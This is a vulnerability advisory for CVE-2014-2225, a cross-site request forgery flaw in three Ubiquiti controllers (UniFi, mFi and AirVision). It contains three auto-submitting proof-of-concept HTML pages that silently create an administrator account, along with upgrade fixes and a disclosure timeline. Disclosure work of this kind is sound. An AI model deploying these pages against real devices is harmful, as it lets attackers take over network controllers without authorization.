----------- Vendor: ----------- Ubiquiti Networks (http://www.ubnt.com/) ----------------------------------------- Affected Products/Versions: ----------------------------------------- UniFi Controller v2.4.6 mFi Controller v2.0.15 AirVision Controller v2.1.3 Note: Previous versions may be affected ----------------- Description: ----------------- Title: Cross-site Request Forgery (CSRF) CVE: CVE-2014-2225 CWE: http://cwe.mitre.org/data/definitions/352.html Detailed writeup: http://sethsec.blogspot.com/2014/07/cve-2014-2225.html Researcher: Seth Art - @sethsec --------------- UniFi POC: --------------- <html> <head> <script> function sendCSRF() { var url_base = "https://192.168.0.106:8443/api/add/admin" var post_data="%7B%22name%22%3A%22csrf%22%2C%22lang%22%3A%22en_US%22%2C%22x_password%22%3A%22csrf%22%7D" var xmlhttp; xmlhttp = new XMLHttpRequest(); xmlhttp.open("POST", url_base, true); xmlhttp.setRequestHeader("Accept","*/*"); xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded; charset=UTF-8"); xmlhttp.withCredentials= "true"; xmlhttp.send(post_data); } </script> </head> <body> <h1>CSRF POC</h1> Sending CSRF Payload!!! <body onload="sendCSRF()"> </body> ------------- mFi POC: ------------- <html> <head> <script> function sendCSRF() { var url_base = "https://192.168.0.106:6443/api/v1.0/add/admin" var post_data="%7B%22name%22%3A%22csrf%22%2C%22lang%22%3A%22en_US%22%2C%22x_password%22%3A%22csrf%22%7D" var xmlhttp; xmlhttp = new XMLHttpRequest(); xmlhttp.open("POST", url_base, true); xmlhttp.setRequestHeader("Accept","*/*"); xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded; charset=UTF-8"); xmlhttp.withCredentials= "true"; xmlhttp.send(post_data); } </script> </head> <body> <h1>CSRF POC</h1> Sending CSRF Payload!!! <body onload="sendCSRF()"> </body> -------------------- AirVision POC: -------------------- <html> <head> <script> function sendCSRF() { var url_base = "https://192.168.0.106:7443/api/v2.0/admin" var post_data="{\”name\”:\”csrf\”,\”email\”:\”csrf@gmail.com\”,\”userGroup:\”:\”admin\”,\”x_password\”:\”password\”,\”confirmPassword\”:\”password\”,\”disabled\”:\”false\”}” var xmlhttp; xmlhttp = new XMLHttpRequest(); xmlhttp.open("POST", url_base, true); xmlhttp.setRequestHeader("Accept","*/*"); xmlhttp.setRequestHeader("Content-type","application/plain; charset=UTF-8"); xmlhttp.withCredentials= "true"; xmlhttp.send(post_data); } </script> </head> <body> <h1>CSRF POC</h1> Sending CSRF Payload!!! <body onload="sendCSRF()"> </body> ------------- Solution: ------------- UniFi Controller - Upgrade to UniFi Controller v3.2.1 or greater mFi Controller - Upgrade to mFi Controller v2.0.24 or greater AirVision Controller - Upgrade to UniFi Video v3.0.1 or greater (Note: The application name changed from AirVision to UniFi Video) ----------------------------- Disclosure Timeline: ----------------------------- 2014-02-16: Notified Ubiquiti of vulnerabilities in UniFi and mFi products 2014-02-17: Ubiquiti acknowledges and requests details 2014-02-17: Report with POC sent to Ubiquiti 2014-02-19: Asked Ubiquiti to confirm receipt of report 2014-02-19: Ubiquti confirms receipt of report and existence of the vulnerabilities 2014-02-25: Notified Ubiquiti of CSRF vulnerability in AirVision product 2014-02-19: Ubiquti confirms receipt of AirVision report and existence of the vulnerability 2014-02-28: CVE-2014-2225 assigned 2014-03-12: Requested status update 2014-03-27: Requested status update 2014-04-07: Requested status update, mention that we might need to bring in a CERT 2014-04-09: Ubiquiti provides timeline for solution 2014-04-18: UniFi Video 3.0.1 is released 2014-05-30: Requested a status update on the remaining two products 2014-06-12: Requested a status update on the remaining two products 2014-06-12: mFi v2.0.24 and UniFi 3.2.1 are released 2014-06-13: Set public disclosure date of 2014-07-24 and notified vendor 2014-07-24: Public disclosure